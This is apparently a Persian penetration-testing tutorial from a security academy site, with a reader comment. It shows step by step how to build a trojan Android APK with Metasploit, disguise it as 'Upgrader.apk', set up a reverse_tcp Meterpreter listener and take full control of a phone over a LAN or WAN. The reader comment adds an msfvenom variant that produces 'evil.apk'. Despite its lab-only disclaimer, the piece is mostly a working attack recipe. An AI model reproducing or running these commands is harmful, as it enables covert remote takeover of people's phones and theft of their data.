اندروید را با کالی لینوکس هک کنید

access_time۱۳۹۹-۰۹-۱۴
perm_identity ارسال شده توسط
folder_open مقالات
visibility 195 بازدید

به سری آموزش های تست نفوذ آکادمی امنیت اطلاعات ایران خوش آمدید. در این مقاله قصد تست نفوذ به دستگاه اندرویدی را داریم که در محیط کالی بوسیله متااسپلویت انجام می شود. پس آماده باشید تا اندروید را با کالی لینوکس هک کنید…

هدف از این آموزش تمرین تست نفوذ و آشنایی با راه های نفوذ در اندروید است، به هیچ وجه برای اهداف شخصی و دسترسی به گوشی انجام ندهید. پیشنهاد ما این است که برای امور تست نفوذ اندروید یک لابراتوار کوچک و کم هزینه برای خود تهیه کنید.

هشدار

مرحله اول

کالی را راه اندازی کنید

وارد کالی لینوکس خود شوید و ترمینال را باز کنید تا مراحل ساخت یک فایل  Trojan .apk برای نفوذ را پیش ببریم.

دستور زیر را در ترمینال بنویسید:

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk

LHOST را آدرس IP خود یا سرور برای برقراری ارتباط وارد کنید. در صورت استفاده از آدرس IP خود باید قابلیت Port forwarding را فعال کنید.

این روش نفوذ در تمام تجهیزات اندرویدی در محیط شبکه اینترنت یعنی WAN هم قابل اجرا است. پس بنشینید و آماده باشید تا اندروید را با کالی لینوکس هک کنید.

دستورات وارد شده در ترمینال کالی لینوکس

مرحله دوم

ترمینال دیگری باز کنید

در حالی که صفحه ترمینال بالا باز است، ترمینال دیگری را باز کنید، و کنسول متااسپلویت را با دستور msfconsole اجرا کنید:

نسول متااسپلویت

مرحله سوم

یک Listener برای دریافت اطلاعات تنطیم کنید

بعد از اینکه متااسپلویت لود شد دستور زیر را اجرا کنید

use exploit/multi/handler

محیط ترمینال

در ادامه باید یک (reverse) payload تنظیم کنیم تا ارتباط بین هکر و قربانی برقرار شود، دستور زیر را تایپ کنید:

set payload android/meterpreter/reverse_tcp

برای تنظیم LHOST همان آدرسی که مرحله قبل تنظیم کردید و برای خودتان است را وارد کنید.

set LHOST 192.168.0.4

مرحله چهارم

اکسپلویت کنید

دستور exploit  را تایپ کنید

سپس برای اینکه اندروید را با کالی لینوکس هک کنید باید فایل Upgrader.apk که برنامه متااسپلویت ساخته است را در تلفن اندروید خود اجرا کنید. این فایل در پوشه Root شما ساخته و ذخیره شده است.

نفوذ موفق

بعد از نصب و اجرا در سیستم اندروید میتوانید به وسیله کنسول متااسپلویت خود، کلیه کنترل اندروید را بدست بگیرید.

——————————————HACKED————————————————-


نکته: ممکن است این روش بر انواع مختلف اندروید های جدید که دارای برزورسانی و تقویت سیستم امنیتی و دارای برنامه امنیتی باشند بدرستی کار نکند.

اگر بیشتر در مورد متااسپلویت میخواهید بدانید، مقالات زیر را بخوانید:

متااسپلویت چیست؟ مقاله ای کامل در مورد متااسپلویت

سایت رسمی متااسپلویت

اشتراک گذاری:
برچسب ها:
درباره مدیریت

تیم مدیریت سایت

مطالب زیر را حتما بخوانید

1 دیدگاه

به گفتگوی ما بپیوندید و دیدگاه خود را با ما در میان بگذارید.

  • با سلام
    اگر با این ارور مواجه میشید: command not found
    این دستور رو بزنید:
    /usr/bin/msfvenom -p android/meterpreter/reverse_tcp LHOST=(Your IP) -f rb -o /root/evil.apk

    پاسخ

دیدگاهتان را بنویسید